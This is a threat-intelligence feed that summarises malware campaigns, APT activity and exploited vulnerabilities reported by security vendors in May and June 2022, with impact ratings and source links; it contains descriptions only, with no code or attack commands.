- QBot_returns_with_new_TTPs
- Date of Scan:
- 2022-06-16
- Impact:
- LOW
- Summary:
- Socinvestigation detection and response analysts detected a banking trojan malware QBOT coming back with new TTPS: distribution via XLSB, and via XLTM.
Source:
https://www.socinvestigation.com/qbot-returns-returns-with-new-ttps-detection-response/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Houdini_RAT_leveraging_JavaScript_Dropper
- Date of Scan:
- 2022-06-16
- Impact:
- LOW
- Summary:
- Houdini leveraging a phishing email with a ZIP archive that contains a JavaScript file called “New-Order.js
—
- Intel Source:
- Volexity
- Intel Name:
- Zero_Day_Sophos_Firewall_Exploitation_and_an_Insidious_Breach_by_DriftingCloud_threat_actor
- Date of Scan:
- 2022-06-16
- Impact:
- MEDIUM
- Summary:
- Volexity observesed a backdoored Shophos Firewall attack. This particular attack leveraged a zero-day exploit to compromise the customer’s firewall. Also it was observed the attacker implement an interesting webshell backdoor, create a secondary form of persistence, and ultimately launch attacks against the customer’s staff. These attacks aimed to further breach cloud-hosted web servers hosting the organization’s public-facing websites.
Source:
https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/
https://github.com/volexity/threat-intel/blob/main/2022/2022-06-15%20DriftingCloud%20-%20Zero-Day%20Sophos%20Firewall%20Exploitation%20and%20an%20Insidious%20Breach/indicators/indicators.csv
—
- Intel Source:
- Qualys
- Intel Name:
- New_Redline_InfoStealer_campaign
- Date of Scan:
- 2022-06-16
- Impact:
- LOW
- Summary:
- Qualys researchers found a new Redline InfoStealer campaign which spreads via fake cracked software hosted on Discord’s content delivery network.
—
- Intel Source:
- Cofense
- Intel Name:
- Monkeypox_phishing_outbreak
- Date of Scan:
- 2022-06-16
- Impact:
- LOW
- Summary:
- Cofense’s Phishing Defence Center has seen attempts to deceive enterprise staff with a series of monkeypox themed phishing emails. As this rare infection spreads around the globe and gains media attention, attackers are likely to continue tweaking their tactics.
Source:
https://cofense.com/blog/monkeypox-phishing-outbreak-becomes-latest-lure
—
- Intel Source:
- Qualys
- Intel Name:
- Potential_attack_vector_using_Follina_Vulnerability
- Date of Scan:
- 2022-06-15
- Impact:
- MEDIUM
- Summary:
- Qualys researchers has examined a potential attack vector as well as technical details of Follina vulnerability.
—
- Intel Source:
- Cyble
- Intel Name:
- Hydra_Android_Distributed_Via_Play_Store
- Date of Scan:
- 2022-06-15
- Impact:
- LOW
- Summary:
- During the routine threat hunting exercise, Cyble Research Labs came across a Twitter Post wherein the researcher mentioned an Android malware variant published on the Play Store. The variant in question acts as a Hostile Downloader and downloads the Hydra Banking Trojan.
Source:
https://blog.cyble.com/2022/06/13/hydra-android-malware-distributed-via-play-store/
https://twitter.com/AndroidInSecure/status/1534175436187500548
—
- Intel Source:
- Sophos
- Intel Name:
- Old_Telerik_vulnerability_exploitation_delivering_cryptominer_and_CobaltStrike_infections
- Date of Scan:
- 2022-06-15
- Impact:
- LOW
- Summary:
- Researchers from Sophos discovered an exploitation of a three-year old vulnerability (CVE-2019-18935) in the Telerik UI web application framework to take control of web servers, installing Cobalt Strike beacons in the form of a DLL payload) to disk, then used the beacon to execute encoded PowerShell commands, which downloaded more malwares by an unknown threat actor.
—
- Intel Source:
- Akamai
- Intel Name:
- Panchan_Botnet_targeting_Linux_servers
- Date of Scan:
- 2022-06-15
- Impact:
- MEDIUM
- Summary:
- Researchers at Akamai has discovered Panchan, a new peer-to-peer botnet and SSH worm and has been actively breaching Linux servers. Panchan is written in Golang, and utilizes its built-in concurrency features to maximize spreadability and execute malware modules.
Source:
https://www.akamai.com/blog/security/new-p2p-botnet-panchan
—
- Intel Source:
- Sophos
- Intel Name:
- Old Telerik vulnerability exploitation delivering cryptominer and CobaltStrike infections
- Date of Scan:
- 2022-06-15
- Impact:
- LOW
- Summary:
- Researchers from Sophos discovered an exploitation of a three-year old vulnerability (CVE-2019-18935) in the Telerik UI web application framework to take control of web servers, installing Cobalt Strike beacons in the form of a DLL payload) to disk, then used the beacon to execute encoded PowerShell commands, which downloaded more malwares by an unknown threat actor.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Saitama_backdoor_using_DNS_tunneling
- Date of Scan:
- 2022-06-15
- Impact:
- LOW
- Summary:
- Researchers identified Saitama backdoor was used in a phishing e-mail that targeted a government official from Jordan’s foreign ministry in an attack attributed to the Iranian group APT34.
—
- Intel Source:
- Zscaler
- Intel Name:
- PureCrypter_dropping_RATs_and_InfoStealer
- Date of Scan:
- 2022-06-14
- Impact:
- LOW
- Summary:
- Zscalers researchers documented workings of a fully-featured malware loader dubbed PureCrypter that’s being purchased by cyber criminals to deliver remote access trojans (RATs) and information stealers.
Source:
https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter
—
- Intel Source:
- Esentire
- Intel Name:
- Purple_Fox_malware_analysis
- Date of Scan:
- 2022-06-14
- Impact:
- LOW
- Summary:
- eSentire’s Threat Response Unit (TRU) team recently observed multiple Purple Fox infections. The malware targets vulnerable versions of Internet Explorer (IE). The infection starts with the execution of a malicious script via mshta.exe, a utility that runs Microsoft HTML Applications (HTA) files.
Source:
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-purple-fox
—
- Intel Source:
- Malwarebytes
- Intel Name:
- The_IP2Scam_tech_support_campaign_scammers
- Date of Scan:
- 2022-06-14
- Impact:
- LOW
- Summary:
- Malwarebytes break down what they call the IP2Scam tech support scheme, by going back in time to track previously used infrastructure
Source:
https://blog.malwarebytes.com/threat-intelligence/2022/06/taking-down-the-ip2scam-tech-support-campaign/
https://github.com/MBThreatIntel/TSS/blob/master/digital_ocean_IP2Scam.csv
https://github.com/MBThreatIntel/TSS/blob/master/digital_ocean_IP2Scam.csv
—
- Intel Source:
- Jamf
- Intel Name:
- ChromeLoader_adware_halted_from_broadcasting_by_Jamf_Protect
- Date of Scan:
- 2022-06-14
- Impact:
- MEDIUM
- Summary:
- CrowdStrike researchers tracked an adware campaign that injects ads into Chrome and Safari browsers on macOS. Victims are tricked into opening a DMG file and running a shell script which masquerades as a legitimate installer application.
—
- Intel Source:
- Avast
- Intel Name:
- New_Linux_Rootkit_Syslogk
- Date of Scan:
- 2022-06-14
- Impact:
- LOW
- Summary:
- Researchers from Avast spotted a new Linux rootkit, dubbed ‘Syslogk,’ that uses specially crafted “magic packets” to activate a dormant backdoor on the device.
—
- Intel Source:
- Confiant
- Intel Name:
- How_SeaFlower_installs_backdoors_in_iOS_Android_web3_wallets
- Date of Scan:
- 2022-06-14
- Impact:
- MEDIUM
- Summary:
- Confiant believes SeaFlower is the most technically sophisticated threat targeting web3 users, right after the infamous Lazarus Group
—
- Intel Source:
- Checkpoint
- Intel Name:
- Iranian_phishing_campaign_linked_to_Phosphorous_APT_group
- Date of Scan:
- 2022-06-14
- Impact:
- LOW
—
- Intel Source:
- Palo Alto
- Intel Name:
- HelloXD_ransomware_and_links_with_x4k_threat_actor
- Date of Scan:
- 2022-06-13
- Impact:
- LOW
- Summary:
- Researchers from PaloAlto noticed in increased activity of Hello XD ransomware, whose operators are now deploying an upgraded sample featuring stronger encryption.
Source:
https://unit42.paloaltonetworks.com/helloxd-ransomware/
—
- Intel Source:
- Palo Alto
- Intel Name:
- Chinese_APT_GALLIUM_levarges_PingPull_RAT_in_Cyberespionage_Campaigns
- Date of Scan:
- 2022-06-13
- Impact:
- MEDIUM
- Summary:
- Unit 42 recently identified a new, difficult-to-detect remote access trojan named PingPull being used by GALLIUM, an advanced persistent threat (APT) group.
Source:
https://unit42.paloaltonetworks.com/pingpull-gallium/
—
- Intel Source:
- CERT-UA
- Intel Name:
- UAC_0113_Sandworm_Group_targeting_media_organisations_in_Ukraine
- Date of Scan:
- 2022-06-13
- Impact:
- LOW
- Summary:
- CERT-UA has analysed an phishing email targeting media organizations of Ukraine which has the topic “LIST of links to interactive maps” and a document attached with same name. The malicious document is delivering malicious CrescentImp malware. CERT-UA has tracked this activity with medium confidence to UAC-0113, which is associated with the Sandworm Group.
—
- Intel Source:
- Checkpoint
- Intel Name:
- Crypto_Miners_Leveraging_Atlassian_Zero_Day_Vulnerability
- Date of Scan:
- 2022-06-13
- Impact:
- MEDIUM
- Summary:
- Checkpoint Labs has uncovered an unauthenticated attacker who can use this vulnerability to execute arbitrary code on the target server by placing a malicious payload in the URI.
Source:
https://blog.checkpoint.com/2022/06/09/crypto-miners-leveraging-atlassian-zero-day-vulnerability/
—
- Intel Source:
- ZScaler
- Intel Name:
- Lyceum_NET_DNS_Backdoor
- Date of Scan:
- 2022-06-10
- Impact:
- MEDIUM
- Summary:
- The Iranian Lycaeum APT hacking group uses a new .NET-based DNS backdoor to conduct attacks on companies in the energy and telecommunication sectors
Source:
https://www.zscaler.com/blogs/security-research/lyceum-net-dns-backdoor
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Credit_card_skimmer_evades_Virtual_Machines
- Date of Scan:
- 2022-06-10
- Impact:
- LOW
- Summary:
- In this blog post Malwarebyres Labs show how a Magecart threat actor distributing a digital skimmer is avoiding researchers and possibly sandboxes by ensuring users are running genuine computers and not virtual ones
—
- Intel Source:
- BlackBerry
- Intel Name:
- Symbiote_malware_detected_in_Linux
- Date of Scan:
- 2022-06-10
- Impact:
- LOW
- Summary:
- Researchers have identified the Symbiote malware with an impact to harvest credentials and providing remote access for the threat actor.
Source:
https://blogs.blackberry.com/en/2022/06/symbiote-a-new-nearly-impossible-to-detect-linux-threat
—
- Intel Source:
- SentinelOne
- Intel Name:
- Aoqin_Dragon_Chinese_linked_APT_spying_for_10 years
- Date of Scan:
- 2022-06-09
- Impact:
- MEDIUM
- Summary:
- SentinelLabs has uncovered a cluster of activity primarily targeting organizations in Southeast Asia and Australia. The threat actor’s primary focus is espionage and relates to targets in Australia, Cambodia, Hong Kong, Singapore, and Vietnam. This activity ttracked as ‘Aoqin Dragon’. Attacks attributable to Aoqin Dragon typically drop one of two backdoors, Mongall and a modified version of the open source Heyoka project.
—
- Intel Source:
- The Hacker News
- Intel Name:
- State_Backed_Hackers_Exploit_Microsoft _Follina’_Bug_to_Target_Entities_in_Europe_and_U.S
- Date of Scan:
- 2022-06-09
- Impact:
- MEDIUM
- Summary:
- A suspected state-aligned threat actor has been attributed to a new set of attacks exploiting the Microsoft Office “Follina” vulnerability to target government entities in Europe and the U.S.
Source:
https://thehackernews.com/2022/06/state-backed-hackers-exploit-microsoft.html
—
- Intel Source:
- ISC.SANS
HelpNet Security
- Intel Name:
- TA570_exploiting_Follina_to_deliver_Qbot_Malware
- Date of Scan:
- 2022-06-09
- Impact:
- MEDIUM
- Summary:
- Researchers at ISC.SANS and HelpNet has identified a malicious DLL files used for Qakbot infections contain a tag indicating their specific distribution channel. This wave of malicious spam ultimately provided two separate methods of Qakbot infection. The first method is one also used by other threat actors, where a disk image contains a Windows shortcut that runs a malicious hidden DLL. The second method is a Word docx file using a CVE-2022-30190 (Follina) exploit.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Malvertising_campaign_leads_to_fake_Firefox_update
- Date of Scan:
- 2022-06-09
- Impact:
- LOW
- Summary:
- Researchers from MalwareBytes came across a malvertising campaign leading to a fake Firefox update.
—
- Intel Source:
- Lacework blog
- Intel Name:
- Kinsing_&_Dark_IoT_botnet_among_threats_targeting_CVE_2022_26134
- Date of Scan:
- 2022-06-09
- Impact:
- MEDIUM
- Summary:
- Details regarding the recent Confluence OGNL (CVE-2022-26134) exploit were released to the public on June 3rd 2022 with Lacework seeing multiple attacks in the wild from both uncategorized and named threats. As of yesterday Lacework have observed active exploitation by known Cloud threat malware families such as Kinsing, “Hezb”, and the Dark.IoT botnet and provides a current inventory of top threats seen exploiting this latest Confluence vulnerability.
Source:
https://www.lacework.com/blog/kinsing-dark-iot-botnet-among-threats-targeting-cve-2022-26134/
—
- Intel Source:
- NCC Group
- Intel Name:
- Black_Basta_Ransomware_leverage_QBot_for_lateral_movement
- Date of Scan:
- 2022-06-08
- Impact:
- MEDIUM
- Summary:
- Researchers at NCC Group spotted a new partnership between the Black Basta ransomware group and the QBot malware operation.
Source:
https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/
—
- Intel Source:
- HP Wolf Security
- Intel Name:
- Spam_Campaign_targeting_victims_with_SVCReady_Malware
- Date of Scan:
- 2022-06-08
- Impact:
- MEDIUM
- Summary:
- Researchers at HP Wolf Security has identified new malicious spam campaigns spreading a previously unknown malware family called ‘SVCReady’. The malware is notable for the unusual way it is delivered to target PCs using shellcode hidden in the properties of Microsoft Office documents.
Source:
https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/
—
- Intel Source:
- Cyble blog
- Intel Name:
- Bumblebee_Loader_on_the_rise
- Date of Scan:
- 2022-06-08
- Impact:
- MEDIUM
- Summary:
- In March 2022, a new malware named “Bumblebee” was discovered and reportedly distributed via spam campaigns. Researchers identified that Bumblebee is a replacement for BazarLoader malware, which has delivered Conti Ransomware in the past. Bumblebee acts as a downloader and delivers known attack frameworks and open-source tools such as Cobalt Strike, Shellcode, Sliver, Meterpreter. Plus downloads other types of malware such as ransomware, trojans, etc. Cyble intelligence indicates that the incidents of Bumblebee infection are on the rise.
Source:
https://blog.cyble.com/2022/06/07/bumblebee-loader-on-the-rise/
—
- Intel Source:
- Qi Anxin Threat Intelligence Center
- Intel Name:
- Operation_Tejas
- Date of Scan:
- 2022-06-08
- Impact:
- LOW
- Summary:
- Qi Anxin Threat Intelligence Center once published the article “Operation Magichm: A Brief Talk on the Manlinghua Organization’s CHM File Delivery and Follow-up Operations” in 2021 . In addition to the new attack methods and samples used in the latest attack in April, this Intel Center also provides an overview of the recent phishing activities of the Maya Elephant (APT-Q-41) and the basics of the Diamondback (APT-Q-39) this year.
—
- Intel Source:
- Trend Micro
- Intel Name:
- Cuba_Ransomware_Group_new_variant
- Date of Scan:
- 2022-06-08
- Impact:
- LOW
- Summary:
- Researchers at Trend Micro identified that the malware authors seem to be pushing some updates to the current binary of a new variant.
—
- Intel Source:
- Avast
- Intel Name:
- Fake_cracked_software_spreading_Crypto_Stealing_malware
- Date of Scan:
- 2022-06-08
- Impact:
- LOW
- Summary:
- Users who download cracked software risk sensitive personal data being stolen by hackers.
—
- Intel Source:
- NCC Group
- Intel Name:
- Black_Basta_Ransomware_targeting_ESXi_servers
- Date of Scan:
- 2022-06-07
- Impact:
- MEDIUM
- Summary:
- Black Basta is the latest ransomware gang to add support for encrypting VMware ESXi virtual machines (VMs) running on enterprise Linux servers.
Source:
https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/
—
- Intel Source:
- Palo Alto
- Intel Name:
- Popping_Eagle_Malware
- Date of Scan:
- 2022-06-07
- Impact:
- MEDIUM
- Summary:
- Researchers at Palo Alto has identified an unknown piece of malware dubbed as Popping Eagle, its activity includes performing a specially crafted DLL hijacking attack. Researchers also observed the attacker following DLL hijacking by performing several network scans and lateral movement steps.
Source:
https://unit42.paloaltonetworks.com/popping-eagle-malware/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Spam_Email_Contains_BitRat_Malware
- Date of Scan:
- 2022-06-07
- Impact:
- LOW
- Summary:
- Researchers at ISC.SANS has analysed a Zipped Email attachment which contains a very large ISO/EXE file, after executing the file in sandbox. It started communicating with BitRat C2 site.
—
- Intel Source:
- Cadosecurity
- Intel Name:
- WatchDog_Evolves_With_a_New_Multi-Stage_Cryptojacking_Attack
- Date of Scan:
- 2022-06-07
- Impact:
- MEDIUM
- Summary:
- Cado Labs’ honeypot infrastructure was recently compromised by a complex and multi-stage cryptojacking attack
—
- Intel Source:
- DFIR Report
- Intel Name:
- Exploitation_of_ManageEngine_SupportCenter_Plus
- Date of Scan:
- 2022-06-07
- Impact:
- LOW
- Summary:
- DFIR observed a threat actor gain initial access to an organization by exploiting a vulnerability in ManageEngine SupportCenter Plus. The threat actor, discovered files on the server and dumped credentials using a web shell, moved laterally to key servers using Plink and RDP and exfiltrated sensitive information using the web shell and RDP.
—
- Intel Source:
- SentinelOne
- Intel Name:
- Mindware_Ransomware
- Date of Scan:
- 2022-06-07
- Impact:
- MEDIUM
- Summary:
- Researchers at SentinelOne has analysed Mindware Ransomware and its similarities with SFile Ransomware, and provided technical indicators.
—
- Intel Source:
- Fortinet
- Intel Name:
- Travel_Themed_attacks_surges_by_multiple_RATs
- Date of Scan:
- 2022-06-06
- Impact:
- MEDIUM
- Summary:
- Multiple rat campaigns have been noted by researchers from Fortinet who are using travel themed lure to targets travel seekers victims. Those rats include Asyncrat, Netwire Rat, Quasar RAT.
Source:
https://www.fortinet.com/blog/threat-research/threat-actors-prey-on-eager-travelers
—
- Intel Source:
- NetSkope
- Intel Name:
- Jasmin_ransomware_tool_rebranded_as_GoodWill_ransomware
- Date of Scan:
- 2022-06-06
- Impact:
- MEDIUM
- Summary:
- Researchers at Netskope Threat Labs has analysed few GoodWill ransomware samples and found that this threat is 100% based on an open-source ransomware named Jasmin, which is a red team tool that can be used to simulate real ransomware attacks.
Source:
https://github.com/netskopeoss/NetskopeThreatLabsIOCs/tree/main/Jasmin%20Ransomware/IOCs
—
- Intel Source:
- NetSkope
- Intel Name:
- Jasmin_ransomware_tool_rebranded_as_GoodWill_ransomware
- Date of Scan:
- 2022-06-06
- Impact:
- MEDIUM
- Summary:
- Researchers at Netskope Threat Labs has analysed few GoodWill ransomware samples and found that this threat is 100% based on an open-source ransomware named Jasmin, which is a red team tool that can be used to simulate real ransomware attacks.
Source:
https://github.com/netskopeoss/NetskopeThreatLabsIOCs/tree/main/Jasmin%20Ransomware/IOCs
—
- Intel Source:
- Trend Micro
- Intel Name:
- YourCyanide_Ransomware_Propagates_With_PasteBin_Discord_Microsoft_Links
- Date of Scan:
- 2022-06-06
- Impact:
- LOW
- Summary:
- The Trend Micro Threat Hunting team recently analyzed a series of CMD-based ransomware variants with a number capabilities such as stealing user information, bypassing remote desktop connections, and propagating through email and physical drives.
Source:
https://www.trendmicro.com/en_us/research/22/f/yourcyanide-a-cmd-based-ransomware.html
—
- Intel Source:
- SecureList
- Intel Name:
- WinDealer_malware_shows_extremely_sophisticated_network_abilities
- Date of Scan:
- 2022-06-06
- Impact:
- LOW
- Summary:
- Researchers have discovered that the malware known as WinDealer, spread by Chinese-speaking Advanced Persistent Threat (APT) actor LuoYu, has the ability to perform intrusions through a man-on-the-side attack.
Source:
https://securelist.com/windealer-dealing-on-the-side/105946/
—
- Intel Source:
- Symantec
- Intel Name:
- Clipminer_Botnet
- Date of Scan:
- 2022-06-06
- Impact:
- LOW
- Summary:
- Threat analysts have discovered a large operation of a new cryptocurrency mining malware called Clipminer that brought its operators at least $1.7 million from transaction hijacking.
—
- Intel Source:
- Trend Micro
- Intel Name:
- DeadBolt_Ransomware
- Date of Scan:
- 2022-06-06
- Impact:
- MEDIUM
- Summary:
- The DeadBolt ransomware kicked off 2022 with a slew of attacks that targeted internet-facing Network-Attached Storage (NAS) devices.
—
- Intel Source:
- Sucuri
- Intel Name:
- Massive_NDSW_NDSX_Malware_Campaign
- Date of Scan:
- 2022-06-05
- Impact:
- MEDIUM
- Summary:
- Researchers at Sucuri has been tracking a campaign since Feb 2019, which they name as ndsw/ndsx malware campaign. The malware consists of several layers: the first of which prominently features the ndsw variable within JavaScript injections, the second of which leverages the ndsx variable in the payload.
Source:
https://blog.sucuri.net/2022/06/analysis-massive-ndsw-ndsx-malware-campaign.html
—
- Intel Source:
- CERT-UA
- Intel Name:
- Cobalt_Strike_Beacon_and_other_vulnerabilities_leveraged_to_target_Ukraine_government_bodies
- Date of Scan:
- 2022-06-03
- Impact:
- LOW
- Summary:
- CERT-UA has analysed an phishing email targeting Ukraine government bodies, it contains a file named “changes in wages with accruals.docx”. The file contains a link to HTML external object, the execution of which, after exploiting vulnerabilities CVE-2021-40444 and CVE-2022-30190 and later damage the system with Cobalt Strike.
—
- Intel Source:
- Jstnk
- Intel Name:
- AsyncRAT_targeting_Colombian_Organisations
- Date of Scan:
- 2022-06-03
- Impact:
- LOW
- Summary:
- Researcher Jose Luis Sánchez Martínez have analysed campaigns related to AsyncRAT targeting Colombia, where there are some modifications in TTPs.
Source:
https://jstnk9.github.io/jstnk9/research/AsyncRAT-Analysis/#summary
—
- Intel Source:
- Volexity
- Intel Name:
- Zero_Day_Exploitation_of_Atlassian_Confluence
- Date of Scan:
- 2022-06-03
- Impact:
- HIGH
- Summary:
- Hackers are actively exploiting a new Atlassian Confluence zero-day vulnerability tracked as CVE-2022-26134 to install web shells, with no fix available at this time.
—
- Intel Source:
- Microsoft
- Intel Name:
- POLONIUM_targeting_Israeli_organizations
- Date of Scan:
- 2022-06-03
- Impact:
- LOW
- Summary:
- POLONIUM has targeted and may compromised more than 20 organizations based in Israel and one intergovernmental organization with operations in Lebanon over the past three months.
—
- Intel Source:
- Mandiant
- Intel Name:
- UNC216_ Shifts_to_LOCKBIT_to_Evade_Sanctions
- Date of Scan:
- 2022-06-03
- Impact:
- MEDIUM
- Summary:
- Mandiant has investigated multiple LOCKBIT ransomware intrusions attributed to UNC2165, a financially motivated threat cluster that shares numerous overlaps with the threat group publicly reported as “Evil Corp.
Source:
https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions
—
- Intel Source:
- ISC.SANS
Cisco Talos
Recorded Future
Fortinet
- Intel Name:
- Follina_zero-day_vulnerability_in_Microsoft_Office_getting_exploited
- Date of Scan:
- 2022-06-02
- Impact:
- HIGH
- Summary:
- A recently discovered zero-day vulnerability CVE-2022-30190 in the Microsoft Windows Support Diagnostic Tool (MSDT) made headlines over the past few days. It is also known under the name “Follina,” exists when MSDT is called using the URL protocol from an application, such as Microsoft Office, Microsoft Word or via an RTF file. The vulnerability has been widely exploited in the wild by threat actors and some of them have been attributed to Chinese threat actor.
—
- Intel Source:
- Cyfirma
- Intel Name:
- Yashma_Ransomware_Report_CYFIRMA
- Date of Scan:
- 2022-06-02
- Impact:
- MEDIUM
- Summary:
- Yashma is a new ransomware seen in the wild since May 2022. This ransomware is the rebranded version of an earlier ransomware named Chaos.
Source:
https://www.cyfirma.com/outofband/yashma-ransomware-report/
—
- Intel Source:
- Zscaler
- Intel Name:
- BITB_attack_impersonating_Indian_government_website
- Date of Scan:
- 2022-06-02
- Impact:
- LOW
- Summary:
- Zscaler ThreatLabz team recently observed a new Browser-in-the Browser (BITB) attack impersonating an Indian government website to deliver a sextortion demand with the threat of releasing sensitive information about victims if they refuse to pay.
—
- Intel Source:
- ASEC
- Intel Name:
- NSIS_Installer_Malware_Included_with_Various_Malicious_Files
- Date of Scan:
- 2022-06-02
- Impact:
- LOW
- Summary:
- The ASEC analysis team recently discovered attackers distributing multiple malicious files with NSIS installers.
—
- Intel Source:
- CISA
- Intel Name:
- Karakurt_Data_Extortion_Group
- Date of Scan:
- 2022-06-01
- Impact:
- MEDIUM
- Summary:
- Karakurt actors have claimed to steal data and threatened to auction it off or release it to the public unless they receive payment of the demanded ransom. Known ransom demands have ranged from $25,000 to $13,000,000 in Bitcoin, with payment deadlines typically set to expire within a week of first contact with the victim.
—
- Intel Source:
- Checkpoint
- Intel Name:
- XLoader_Botnet_new_C&C_Infrastructure
- Date of Scan:
- 2022-05-31
- Impact:
- MEDIUM
- Summary:
- Researchers at Checkpoint Research has identified the real C&C servers among thousands of legitimate domains used by Xloader Botnet.
Source:
https://research.checkpoint.com/2022/xloader-botnet-find-me-if-you-can/
—
- Intel Source:
- Cyble
- Intel Name:
- CVE_2022_30190_Microsoft_Support_Diagnostic_Tool_(MSDT)_RCE_Vulnerability
- Date of Scan:
- 2022-05-31
- Impact:
- MEDIUM
- Summary:
- Recently, Microsoft discussed a new Zero-Day vulnerability (CVE-2022-30190) that affects Microsoft Support Diagnostic Tool (MSDT) and allows the attackers to execute arbitrary code by exploiting it.
Source:
https://blog.cyble.com/2022/05/31/new-zero-day-exploit-spotted-in-the-wild/
—
- Intel Source:
- 360 Threat Intelligence Center
- Intel Name:
- APTC53_or_Gamaredon_new_DDoS_Attack_mission
- Date of Scan:
- 2022-05-31
- Impact:
- MEDIUM
- Summary:
- 360 Security Brain has detected more frequent network attacks related to the APT-C-53/Gamaredon Group. The Group began to release the open source DDoS Trojan program ” LOIC ” to carry out DDoS attacks.
—
- Intel Source:
- Trend Micro
- Intel Name:
- WSO2_Vulnerability_exploited_to_install_Linux_compatible_CobaltStrike_Beacons
- Date of Scan:
- 2022-05-31
- Impact:
- MEDIUM
- Summary:
- Researchers at TrendMicro has observed attackers are exploiting WSO2 vulnerability and intiating a outbound connection with malicious Cobalt Strike callback destination and command and control (C&C) server ipaddress.
—
- Intel Source:
- AT&T Alien Labs
- Intel Name:
- EnemyBot_targeting_Content_Management_System_servers_and_Android_devices
- Date of Scan:
- 2022-05-31
- Impact:
- MEDIUM
- Summary:
- Researchers at AT&T Alien Labs has identified that EnemyBot is expanding its capabilities, exploiting vulnerabilities of 2022, and now targeting IoT devices, web servers, Android devices and content management system (CMS) servers.
—
- Intel Source:
- ASEC
- Intel Name:
- XXL_Malware_distributed_through_Email
- Date of Scan:
- 2022-05-30
- Impact:
- LOW
- Summary:
- XXL Malware distributed through Email
—
- Intel Source:
- Fortinet
- Intel Name:
- Phishing_campaign_delivering_AveMariaRAT_BitRAT_PandoraHVNC_Part_II
- Date of Scan:
- 2022-05-30
- Impact:
- MEDIUM
- Summary:
- Researchers at Fortinet’s FortiGaurd Labs has shared part-2 of the analysis where a phishing campaign delivering three fileless malware onto a victim’s device. Once executed, Malware are able to steal sensitive information from that device. It is majorly affecting Microsoft Windows platform users.
Source:
https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware-part-two
—
- Intel Source:
- 360 Total Security
- Intel Name:
- Magniber_ransomware_targeting_Windows11_users
- Date of Scan:
- 2022-05-28
- Impact:
- MEDIUM
- Summary:
- Researchers at 360 Total Security has detected a new attack on Windows11 users, where Magniber ransomware disguised as a Windows 10 upgrade patch package and spread widely.
—
- Intel Source:
- Inquest
- Intel Name:
- Tandem_Espionage_Campaign
- Date of Scan:
- 2022-05-27
- Impact:
- LOW
- Summary:
- Researcher Dmitry Melikov at Inquest has discovered an interesting campaign distributing malicious documents. Which used the download chain as well as legitimate payload hosting services.
Source:
https://inquest.net/blog/2022/05/25/tandem-espionage
—
- Intel Source:
- CloudSEK
- Intel Name:
- GoodWill_Ransomware
- Date of Scan:
- 2022-05-27
- Impact:
- MEDIUM
- Summary:
- Researchers at CloudSEK has analysed GoodWill ransomware group activity, which forces victims to donate to the poor and provides financial assistance to patients in need.
—
- Intel Source:
- IBM Security X-Force
- Intel Name:
- Analysis_of_Black_Basta_Ransomware
- Date of Scan:
- 2022-05-27
- Impact:
- MEDIUM
- Summary:
- Researchers from IBM documented technical analysis of Black Basta ransomware and provided with IoC. Black Basta first appeared in April 2022.
Source:
https://securityintelligence.com/posts/black-basta-ransomware-group-besting-network/
—
- Intel Source:
- Trustwave
- Intel Name:
- Grandoreiro_Banking_Malware
- Date of Scan:
- 2022-05-27
- Impact:
- MEDIUM
- Summary:
- Researchers from Trustwave SpiderLabs have identified Grandoreiro malware campaign targeting bank users from Brazil, Spain, and Mexico. The campaign exploits the tax season in target countries by sending out tax-themed phishing emails.
—
- Intel Source:
- CrowdStrike
- Intel Name:
- Mirai_malware_variants_doubled_for_Intel_powered_Linux_systems
- Date of Scan:
- 2022-05-26
- Impact:
- MEDIUM
- Summary:
- Crowdstrike research said, Mirai malware variants compiled for Intel-powered Linux systems double (101%) in Q1 2022 compared to Q1 2021.
Source:
https://www.crowdstrike.com/blog/linux-mirai-malware-double-on-stronger-chips/
—
- Intel Source:
- XJunior
- Intel Name:
- Deep_Analysis_on_new_version_of_Mars_Stealer_Malware
- Date of Scan:
- 2022-05-26
- Impact:
- LOW
- Summary:
- Security Researcher Mohamed Ashraf has analysed a new version (V8) of Mars Stealer Malware. Researchers has identified anti-analysis technique, diffrent encryption algoithm, new anti debug technique, external dlls are in one zip file
Source:
https://x-junior.github.io/malware%20analysis/MarsStealer/#iocs
—
- Intel Source:
- TeamCymru
- Intel Name:
- Threat_actors_using_Browser_automation_framework
- Date of Scan:
- 2022-05-26
- Impact:
- LOW
- Summary:
- Researchers from Team Cymru have noticed and alerted about a free-to-use browser automation framework that’s being increasingly used by threat actors as part of their attack campaigns.
Source:
https://team-cymru.com/blog/2022/05/25/bablosoft-lowering-the-barrier-of-entry-for-malicious-actors/
—
- Intel Source:
- Sekoia
- Intel Name:
- TURLA_new_phishing_based_reconnaissance_campaign
- Date of Scan:
- 2022-05-26
- Impact:
- LOW
- Summary:
- Sekoia Threat & Detection Team have exposed a reconnaissance and espionage campaign from the Turla intrusion set against the Baltic Defense College, the Austrian Economic Chamber which has a role in government decision-making such as economic sanctions and NATO’s eLearning platform JDAL pointing Russian Intelligence interest for defense sector in Eastern Europe.
Source:
https://blog.sekoia.io/turla-new-phishing-campaign-eastern-europe/
—
- Intel Source:
- XJunior
- Intel Name:
- Deep_Analysis_on_new_version_of_Mars_Stealer_Malware
- Date of Scan:
- 2022-05-26
- Impact:
- LOW
- Summary:
- Security Researcher Mohamed Ashraf has analysed a new version (V8) of Mars Stealer Malware. Researchers has identified anti-analysis technique, diffrent encryption algoithm, new anti debug technique, external dlls are in one zip file
Source:
https://x-junior.github.io/malware%20analysis/MarsStealer/#iocs
—
- Intel Source:
- WalMart
- Intel Name:
- SocGholish_Campaigns_and_Initial_Access_Kit
- Date of Scan:
- 2022-05-26
- Impact:
- MEDIUM
- Summary:
- Researchers from WalMart found that SocGholish have been one of the prominent Initial Access vector for threat actors and have also partnered with Evil Corp.
Source:
https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee
—
- Intel Source:
- BlackBerry
- Intel Name:
- Yashma_Latest_version_of_Chaos_Ransomware
